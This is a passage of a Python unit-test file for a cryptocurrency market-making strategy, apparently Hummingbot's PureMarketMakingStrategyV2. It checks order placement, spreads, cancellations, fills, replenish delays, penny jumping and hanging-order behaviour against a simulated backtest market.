maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(1.0, maker_fill.amount) self.maker_order_fill_logger.clear() def test_market_become_wider(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) bid_order: LimitOrder = self.strategy.active_bids[0][1] ask_order: LimitOrder = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.simulate_order_book_widening(self.maker_data.order_book, 90, 110) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(2, len(self.cancel_order_logger.event_log)) self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) bid_order: LimitOrder = self.strategy.active_bids[0][1] ask_order: LimitOrder = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) def test_market_became_narrower(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) bid_order: LimitOrder = self.strategy.active_bids[0][1] ask_order: LimitOrder = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.maker_data.order_book.apply_diffs([OrderBookRow(99.5, 30, 2)], [OrderBookRow(100.5, 30, 2)], 2) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) bid_order = self.strategy.active_bids[0][1] ask_order = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) def test_order_fills_after_cancellation(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) bid_order: LimitOrder = self.strategy.active_bids[0][1] ask_order: LimitOrder = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(2, len(self.cancel_order_logger.event_log)) bid_order: LimitOrder = self.strategy.active_bids[0][1] ask_order: LimitOrder = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.simulate_limit_order_fill(self.maker_market, bid_order) self.simulate_limit_order_fill(self.maker_market, ask_order) fill_events = self.maker_order_fill_logger.event_log self.assertEqual(2, len(fill_events)) bid_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.SELL] ask_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.BUY] self.assertEqual(1, len(bid_fills)) self.assertEqual(1, len(ask_fills)) self.maker_order_fill_logger.clear() def test_strategy_after_user_cancels_orders(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) bid_order: LimitOrder = self.strategy.active_bids[0][1] ask_order: LimitOrder = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.strategy.cancel_order(self.market_info, bid_order.client_order_id) self.strategy.cancel_order(self.market_info, ask_order.client_order_id) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(0, len(self.strategy.active_bids)) self.assertEqual(0, len(self.strategy.active_asks)) def test_strategy_with_transaction_costs(self): self.clock.remove_iterator(self.strategy) logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL & (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE)) self.strategy_with_tx_costs: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, add_transaction_costs_to_orders=True, filter_delegate=self.filter_delegate, sizing_delegate=self.constant_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, logging_options=logging_options ) self.clock.add_iterator(self.strategy_with_tx_costs) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.strategy_with_tx_costs.active_bids)) self.assertEqual(1, len(self.strategy_with_tx_costs.active_asks)) # Fees are zero here, check whether order placements are working bid_order: LimitOrder = self.strategy_with_tx_costs.active_bids[0][1] ask_order: LimitOrder = self.strategy_with_tx_costs.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) # Check if orders are placed after order_refresh_time self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(2, len(self.cancel_order_logger.event_log)) bid_order: LimitOrder = self.strategy_with_tx_costs.active_bids[0][1] ask_order: LimitOrder = self.strategy_with_tx_costs.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) # Check if order fills are working self.simulate_limit_order_fill(self.maker_market, bid_order) self.simulate_limit_order_fill(self.maker_market, ask_order) fill_events = self.maker_order_fill_logger.event_log self.assertEqual(2, len(fill_events)) bid_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.SELL] ask_fills: List[OrderFilledEvent] = [evt for evt in fill_events if evt.trade_type is TradeType.BUY] self.assertEqual(1, len(bid_fills)) self.assertEqual(1, len(ask_fills)) self.maker_order_fill_logger.clear() def test_external_exchange_price_source(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.ext_exc_price_strategy) end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(1, len(self.ext_exc_price_strategy.active_bids)) # There should be no sell order, since its price will be below first bid order on the order book. self.assertEqual(0, len(self.ext_exc_price_strategy.active_asks)) # check price data from external exchange is used for order placement bid_order: LimitOrder = self.ext_exc_price_strategy.active_bids[0][1] self.assertEqual(Decimal("49.5"), bid_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) def test_external_exchange_price_source_empty_orderbook(self): self.simulate_order_book_widening(self.maker_data.order_book, 0, 10000) self.assertEqual(0, len(list(self.maker_data.order_book.bid_entries()))) self.assertEqual(0, len(list(self.maker_data.order_book.ask_entries()))) self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.ext_exc_price_strategy) end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(1, len(self.ext_exc_price_strategy.active_bids)) self.assertEqual(1, len(self.ext_exc_price_strategy.active_asks)) # check price data from external exchange is used for order placement bid_order: LimitOrder = self.ext_exc_price_strategy.active_bids[0][1] self.assertEqual(Decimal("49.5"), bid_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) ask_order: LimitOrder = self.ext_exc_price_strategy.active_asks[0][1] self.assertEqual(Decimal("50.5"), ask_order.price) self.assertEqual(Decimal("1.0"), ask_order.quantity) def test_multi_order_external_exchange_price_source(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.multi_orders_ext_exc_price_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(self.multi_orders_ext_exc_price_strategy.active_bids)) self.assertEqual(0, len(self.multi_orders_ext_exc_price_strategy.active_asks)) first_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[0][1] self.assertEqual(Decimal("49.5"), first_bid_order.price) self.assertEqual(Decimal("1.0"), first_bid_order.quantity) last_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[-1][1] last_bid_price = Decimal(49.5 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertEqual(Decimal("1.0"), last_bid_order.quantity) def test_multi_order_external_exchange_price_source_empty_order_book(self): self.simulate_order_book_widening(self.maker_data.order_book, 0, 10000) self.assertEqual(0, len(list(self.maker_data.order_book.bid_entries()))) self.assertEqual(0, len(list(self.maker_data.order_book.ask_entries()))) self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.multi_orders_ext_exc_price_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(self.multi_orders_ext_exc_price_strategy.active_bids)) self.assertEqual(5, len(self.multi_orders_ext_exc_price_strategy.active_asks)) first_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[0][1] self.assertEqual(Decimal("49.5"), first_bid_order.price) self.assertEqual(Decimal("1.0"), first_bid_order.quantity) first_ask_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_asks[0][1] self.assertEqual(Decimal("50.5"), first_ask_order.price) self.assertEqual(Decimal("1.0"), first_ask_order.quantity) last_bid_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_bids[-1][1] last_bid_price = Decimal(49.5 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertEqual(Decimal("1.0"), last_bid_order.quantity) last_ask_order: LimitOrder = self.multi_orders_ext_exc_price_strategy.active_asks[-1][1] last_ask_price = Decimal(50.5 * (1 + 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3) self.assertEqual(Decimal("1.0"), last_ask_order.quantity) def test_external_feed_price_source(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.ext_feed_price_strategy) end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(0, len(self.ext_feed_price_strategy.active_bids)) self.assertEqual(1, len(self.ext_feed_price_strategy.active_asks)) # check price data from external exchange is used for order placement ask_order: LimitOrder = self.ext_feed_price_strategy.active_asks[0][1] self.assertEqual(Decimal("202"), ask_order.price) self.assertEqual(Decimal("1.0"), ask_order.quantity) def test_external_feed_price_source_empty_orderbook(self): self.simulate_order_book_widening(self.maker_data.order_book, 0, 10000) self.assertEqual(0, len(list(self.maker_data.order_book.bid_entries()))) self.assertEqual(0, len(list(self.maker_data.order_book.ask_entries()))) self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.ext_feed_price_strategy) end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(1, len(self.ext_feed_price_strategy.active_bids)) self.assertEqual(1, len(self.ext_feed_price_strategy.active_asks)) # check price data from external exchange is used for order placement bid_order: LimitOrder = self.ext_feed_price_strategy.active_bids[0][1] self.assertEqual(Decimal("198"), bid_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) ask_order: LimitOrder = self.ext_feed_price_strategy.active_asks[0][1] self.assertEqual(Decimal("202"), ask_order.price) self.assertEqual(Decimal("1.0"), ask_order.quantity) def test_spread_configs_update_multiple_mode(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.multi_order_equal_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids)) self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks)) first_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) last_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[-1][1] last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.01")) last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.01")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 2) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 2) ConfigCommand.update_running_pure_mm(self.multi_order_equal_strategy, "bid_spread", Decimal('2')) ConfigCommand.update_running_pure_mm(self.multi_order_equal_strategy, "ask_spread", Decimal('2')) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) first_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[0][1] self.assertEqual(Decimal("98"), first_bid_order.price) self.assertEqual(Decimal("102"), first_ask_order.price) last_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[-1][1] last_bid_price = Decimal(98 * (1 - 0.01) ** 4).quantize(Decimal("0.01")) last_ask_price = Decimal(102 * (1 + 0.01) ** 4).quantize(Decimal("0.01")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 2) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 2) def test_multiple_orders_equal_sizes(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.multi_order_equal_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids)) self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks)) first_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("1.0"), first_bid_order.quantity) self.assertEqual(Decimal("1.0"), first_ask_order.quantity) last_bid_order: LimitOrder = self.multi_order_equal_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.multi_order_equal_strategy.active_asks[-1][1] last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3) self.assertEqual(Decimal("1.0"), last_bid_order.quantity) self.assertEqual(Decimal("1.0"), last_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids)) self.assertEqual(4, len(self.multi_order_equal_strategy.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(1.0, maker_fill.amount) self.strategy.cancel_order(self.market_info, first_bid_order.client_order_id) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(0, len(self.strategy.active_bids)) self.assertEqual(0, len(self.strategy.active_asks)) def test_multiple_orders_staggered_sizes(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.multi_order_staggered_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(5, len(self.multi_order_staggered_strategy.active_bids)) self.assertEqual(5, len(self.multi_order_staggered_strategy.active_asks)) first_bid_order: LimitOrder = self.multi_order_staggered_strategy.active_bids[0][1] first_ask_order: LimitOrder = self.multi_order_staggered_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), first_bid_order.price) self.assertEqual(Decimal("101"), first_ask_order.price) self.assertEqual(Decimal("1.0"), first_bid_order.quantity) self.assertEqual(Decimal("1.0"), first_ask_order.quantity) last_bid_order: LimitOrder = self.multi_order_staggered_strategy.active_bids[-1][1] last_ask_order: LimitOrder = self.multi_order_staggered_strategy.active_asks[-1][1] last_bid_price = Decimal(99 * (1 - 0.01) ** 4).quantize(Decimal("0.001")) last_ask_price = Decimal(101 * (1 + 0.01) ** 4).quantize(Decimal("0.001")) last_bid_order_size = Decimal(1 + (0.5 * 4)).quantize(Decimal("0.001")) last_ask_order_size = Decimal(1 + (0.5 * 4)).quantize(Decimal("0.001")) self.assertAlmostEqual(last_bid_price, last_bid_order.price, 3) self.assertAlmostEqual(last_ask_price, last_ask_order.price, 3) self.assertAlmostEqual(last_bid_order_size, last_bid_order.quantity) self.assertAlmostEqual(last_ask_order_size, last_ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.assertEqual(5, len(self.multi_order_staggered_strategy.active_bids)) self.assertEqual(4, len(self.multi_order_staggered_strategy.active_asks)) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, maker_fill.trade_type) self.assertAlmostEqual(101, maker_fill.price) self.assertAlmostEqual(1.0, maker_fill.amount) self.strategy.cancel_order(self.market_info, first_bid_order.client_order_id) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(0, len(self.strategy.active_bids)) self.assertEqual(0, len(self.strategy.active_asks)) self.maker_order_fill_logger.clear() def test_balance_for_multiple_equal_orders(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.multi_order_equal_strategy) self.maker_market.set_balance("WETH", 0) end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(0, len(self.multi_order_equal_strategy.active_bids)) self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks)) self.maker_market.set_balance("COINALPHA", 0) end_ts += self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(0, len(self.multi_order_equal_strategy.active_bids)) self.assertEqual(0, len(self.multi_order_equal_strategy.active_asks)) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 5000) end_ts += self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(5, len(self.multi_order_equal_strategy.active_bids)) self.assertEqual(5, len(self.multi_order_equal_strategy.active_asks)) def test_balance_for_multiple_staggered_orders(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.multi_order_staggered_strategy) self.maker_market.set_balance("WETH", 0) end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(0, len(self.multi_order_staggered_strategy.active_bids)) self.assertEqual(5, len(self.multi_order_staggered_strategy.active_asks)) self.maker_market.set_balance("COINALPHA", 0) end_ts += self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(0, len(self.multi_order_staggered_strategy.active_bids)) self.assertEqual(0, len(self.multi_order_staggered_strategy.active_asks)) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 5000) end_ts += self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(5, len(self.multi_order_staggered_strategy.active_bids)) self.assertEqual(5, len(self.multi_order_staggered_strategy.active_asks)) def test_replenish_delay(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.delayed_placement_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.delayed_placement_strategy.active_bids)) self.assertEqual(1, len(self.delayed_placement_strategy.active_asks)) ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1] self.simulate_limit_order_fill(self.maker_market, ask_order) # Ask is filled and due to delay is not replenished immediately self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) self.assertEqual(1, len(self.delayed_placement_strategy.active_bids)) self.assertEqual(0, len(self.delayed_placement_strategy.active_asks)) # Orders are placed after replenish delay self.clock.backtest_til(self.start_timestamp + 4 * self.clock_tick_size) self.assertEqual(1, len(self.delayed_placement_strategy.active_bids)) self.assertEqual(1, len(self.delayed_placement_strategy.active_asks)) # Prices are not adjusted according to filled price as per settings bid_order: LimitOrder = self.delayed_placement_strategy.active_bids[0][1] ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.maker_order_fill_logger.clear() def test_replenish_delay_multiple_fills(self): self.clock.remove_iterator(self.strategy) self.clock.add_iterator(self.delayed_placement_strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.delayed_placement_strategy.active_bids)) self.assertEqual(1, len(self.delayed_placement_strategy.active_asks)) ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1] bid_order: LimitOrder = self.delayed_placement_strategy.active_bids[0][1] self.simulate_limit_order_fill(self.maker_market, ask_order) # Ask is filled and due to delay is not replenished immediately self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) self.assertEqual(1, len(self.delayed_placement_strategy.active_bids)) self.assertEqual(0, len(self.delayed_placement_strategy.active_asks)) self.simulate_limit_order_fill(self.maker_market, bid_order) # Even if both orders are filled, orders are not placed due to delay self.clock.backtest_til(self.start_timestamp + 3 * self.clock_tick_size) self.assertEqual(0, len(self.delayed_placement_strategy.active_bids)) self.assertEqual(0, len(self.delayed_placement_strategy.active_asks)) # Orders are placed after replenish delay self.clock.backtest_til(self.start_timestamp + 4 * self.clock_tick_size) self.assertEqual(1, len(self.delayed_placement_strategy.active_bids)) self.assertEqual(1, len(self.delayed_placement_strategy.active_asks)) # Prices are not adjusted according to filled price as per settings bid_order: LimitOrder = self.delayed_placement_strategy.active_bids[0][1] ask_order: LimitOrder = self.delayed_placement_strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.maker_order_fill_logger.clear() def test_penny_jumping_feature(self): self.clock.remove_iterator(self.strategy) self.clock.remove_iterator(self.maker_market) self.maker_market_2: BacktestMarket = BacktestMarket() self.maker_data_2: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs) self.maker_data_2.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=4, volume_step_size=10) self.maker_market_2.add_data(self.maker_data_2) self.maker_market_2.set_balance("COINALPHA", 500) self.maker_market_2.set_balance("WETH", 5000) self.maker_market_2.set_balance("QETH", 500) self.maker_market_2.set_quantization_param( QuantizationParams( self.maker_trading_pairs[0], 6, 6, 6, 6 ) ) self.market_info: MarketTradingPairTuple = MarketTradingPairTuple( *([self.maker_market_2] + self.maker_trading_pairs) ) logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL & (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE)) self.penny_jumping_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.constant_pricing_delegate, sizing_delegate=self.constant_sizing_delegate, order_optimization_enabled=True, order_refresh_time=900, filled_order_delay=80, hanging_orders_enabled=True, logging_options=logging_options ) self.clock.add_iterator(self.penny_jumping_strategy) self.clock.add_iterator(self.maker_market_2) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.penny_jumping_strategy.active_bids)) self.assertEqual(1, len(self.penny_jumping_strategy.active_asks)) bid_order: LimitOrder = self.penny_jumping_strategy.active_bids[0][1] ask_order: LimitOrder = self.penny_jumping_strategy.active_asks[0][1] # Top bid is 98 and suggested price is 99 from pricing proposal # With penny jumping, bid price is just one above top bid self.assertEqual(Decimal("98.0001"), bid_order.price) # Top ask is 102 and suggested price is 101 from pricing proposal # With penny jumping, ask price is just one below top ask self.assertEqual(Decimal("101.999"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) class PureMarketMakingV2HangingOrderUnitTest(unittest.TestCase): start: pd.Timestamp = pd.Timestamp("2019-01-01", tz="UTC") end: pd.Timestamp = pd.Timestamp("2019-01-01 01:00:00", tz="UTC") start_timestamp: float = start.timestamp() end_timestamp: float = end.timestamp() maker_trading_pairs: List[str] = ["COINALPHA-WETH", "COINALPHA", "WETH"] def setUp(self): self.clock_tick_size = 1 self.clock: Clock = Clock(ClockMode.BACKTEST, self.clock_tick_size, self.start_timestamp, self.end_timestamp) self.maker_market: BacktestMarket = BacktestMarket() self.maker_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs) self.mid_price = 100 self.bid_threshold = 0.01 self.ask_threshold = 0.01 self.order_refresh_time = 30 self.maker_data.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=1, volume_step_size=10) self.constant_pricing_delegate = ConstantSpreadPricingDelegate(Decimal(self.bid_threshold), Decimal(self.ask_threshold)) self.constant_sizing_delegate = ConstantSizeSizingDelegate(Decimal("1.0")) self.filter_delegate = PassThroughFilterDelegate() self.maker_market.add_data(self.maker_data) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 5000) self.maker_market.set_balance("QETH", 500) self.maker_market.set_quantization_param( QuantizationParams( self.maker_trading_pairs[0], 6, 6, 6, 6 ) ) self.market_info: MarketTradingPairTuple = MarketTradingPairTuple( *([self.maker_market] + self.maker_trading_pairs) ) logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL & (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE)) self.hanging_orders_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.constant_pricing_delegate, sizing_delegate=self.constant_sizing_delegate, order_refresh_time=4, filled_order_delay=8, hanging_orders_enabled=True, logging_options=logging_options, hanging_orders_cancel_pct=0.05 ) self.multiple_order_pricing_delegate = ConstantMultipleSpreadPricingDelegate( bid_spread=Decimal(self.bid_threshold), ask_spread=Decimal(self.ask_threshold), order_level_spread=Decimal("0.01"), order_levels=Decimal("5") ) self.equal_sizing_delegate = StaggeredMultipleSizeSizingDelegate( order_start_size=Decimal("1.0"), order_step_size=Decimal("0"), order_levels=Decimal("5") ) self.multi_orders_hanging_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.multiple_order_pricing_delegate, sizing_delegate=self.equal_sizing_delegate, order_refresh_time=4, filled_order_delay=8, hanging_orders_enabled=True, logging_options=logging_options, hanging_orders_cancel_pct=0.1 ) self.replenish_delay_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.constant_pricing_delegate, sizing_delegate=self.constant_sizing_delegate, order_refresh_time=4, filled_order_delay=8, logging_options=logging_options ) self.replenish_delay_multiple_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.multiple_order_pricing_delegate, sizing_delegate=self.equal_sizing_delegate, order_refresh_time=4, filled_order_delay=8, logging_options=logging_options ) self.logging_options = logging_options self.clock.add_iterator(self.maker_market) self.maker_order_fill_logger: EventLogger = EventLogger() self.cancel_order_logger: EventLogger = EventLogger() self.maker_market.add_listener(MarketEvent.OrderFilled, self.maker_order_fill_logger) self.maker_market.add_listener(MarketEvent.OrderCancelled, self.cancel_order_logger) def test_hanging_orders_feature(self): strategy = self.hanging_orders_strategy self.clock.add_iterator(strategy) self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(strategy.active_bids)) self.assertEqual(1, len(strategy.active_asks)) bid_order: LimitOrder = strategy.active_bids[0][1] PureMarketMakingV2UnitTest.simulate_limit_order_fill(self.maker_market, bid_order) # Bid is filled and due to delay is not replenished immediately # Ask order is now hanging but is active self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) self.assertEqual(0, len(strategy.active_bids)) self.assertEqual(1, len(strategy.active_asks)) self.assertEqual(1, len(strategy.hanging_order_ids)) hanging_order_id = strategy.hanging_order_ids[0] # At order_refresh_time (4 seconds), hanging order remains. self.clock.backtest_til(self.start_timestamp + 5 * self.clock_tick_size) self.assertEqual(0, len(strategy.active_bids)) self.assertEqual(1, len(strategy.active_asks)) # At filled_order_delay (8 seconds), a new set of bid and ask orders (one each) is created self.clock.backtest_til(self.start_timestamp + 10 * self.clock_tick_size) self.assertEqual(1, len(strategy.active_bids)) self.assertEqual(2, len(strategy.active_asks)) self.assertIn(hanging_order_id, [order.client_order_id for market, order in strategy.active_asks]) PureMarketMakingV2UnitTest.simulate_order_book_widening(self.maker_data.order_book, 80, 100) # As book bids moving lower, the ask hanging order price spread is now more than the hanging_orders_cancel_pct # Hanging order is canceled and removed from the active list self.clock.backtest_til(self.start_timestamp + 11 * self.clock_tick_size) self.assertEqual(1, len(strategy.active_bids)) self.assertEqual(1, len(strategy.active_asks)) self.assertNotIn(strategy.active_asks[0][1].client_order_id, strategy.hanging_order_ids) # Prices are not adjusted according to filled price as per settings bid_order: 